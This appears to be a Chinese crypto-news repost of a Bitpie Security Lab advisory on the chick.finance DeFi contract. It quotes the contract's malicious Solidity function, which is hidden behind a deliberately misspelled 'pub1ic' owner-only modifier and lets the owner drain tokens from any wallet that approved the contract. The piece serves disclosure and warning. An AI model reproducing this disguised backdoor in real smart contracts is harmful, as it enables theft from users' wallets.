就在刚刚,YFII 通报了 chick.finance 合约代码的风险,不过其中提到的“用户充值的所有代币,开发者都有权限提取”这句话其实并不准确,因此在这里我们需要给大家做下更详细的描述:该合约恶意代码的问题并不在于“开发者事发后能提取用户存在合约中的代币”(开发者本来就能干这事儿),而在于对于任何给该合约授权了的用户,开发者都能把你钱包里的代币一扫而空(不仅仅是你存入合约的),这正是比特派安全实验室在之前的那篇《以太坊 Defi 生态当前最大的安全隐患》一文中提到的“滥用合约授权问题”。恶意代码是如下这段:function startReward(address _from, uint256 amount) external pub1ic{ weth.safeTransferFrom(_from, owner(), amount); }开发者对故意拼写错误的 pub1ic 做了如下约束(也就是只有合约 Owner 才能调用,如果没这个调用,那就变成谁都能干这事儿了,开发者想的是自己偷,肯定不想让别人偷)modifier pub1ic() { require(isOwner(), \”Ownable: caller is not the owner\”); _; }上述代码的逻辑很简单,干的就是那些给这个合约授权了的用户,合约 Owner 都能把你的代币转给 Owner,就这么简单。这其实是 DeFi 生态里非常严重的恶性事件,理应引起全行业的重视,因为这次可能恶意开发者只是用拼写错误的方式来试图蒙骗大家(把 public 写成 pub1ic),然后很幸运的第一时间被发现了,那下次呢?是不是可以写出逻辑复杂并且很难被看出来的漏洞,静静的等待上线把各位的钱包一扫而空呢?要再次强调的是,这个例子中,您损失的可不仅仅是您存入合约的资产,而是你钱包里的全部资产,明白了吗?我们之前在向全行业提出“滥用合约授权”问题的时候,就曾预计到可能会有开发者作恶的情况出现,没想到这一天来的这么快,这次代码伪装的比较蠢,那下次呢?下次 DeFi 矿工们是否还能躲得过去了呢?比特派安全实验室2020年8月24日注:律动报道网址 https://www.theblockbeats.com/flash/11555合约地址 https://cn.etherscan.com/address/0x482e7bcb8e24d3d9fc0669385373032e8dab5461
关于作者: szhbsd
相关文章
-
星辰论币:BTC6月10日日内行情分析
点赞(548) 阅读(1199) -
小牛论币–晚盘分析:晚间关注9750趋势支撑
点赞(543) 阅读(1145) -
币圈神话在币圈你有什么梦想
点赞(549) 阅读(1056)
热门文章
1行走笔记:从交易到理财,听加密首富畅谈币圈起伏
点赞(301)
阅读(115293)
2pi币今日价格行情,pi币现在怎么样多少钱一个?
点赞(1.92K)
阅读(85797)
3维卡币2020年价格前景最新消息,one币维卡币行情现在怎么样了?
点赞(1.93K)
阅读(78500)
4pi币在美国多少钱一个?pi币交易所最新价格!
点赞(1.65K)
阅读(74856)
5pi币最新期货价格走势图,2020年pi币最新消息
点赞(1.64K)
阅读(66639)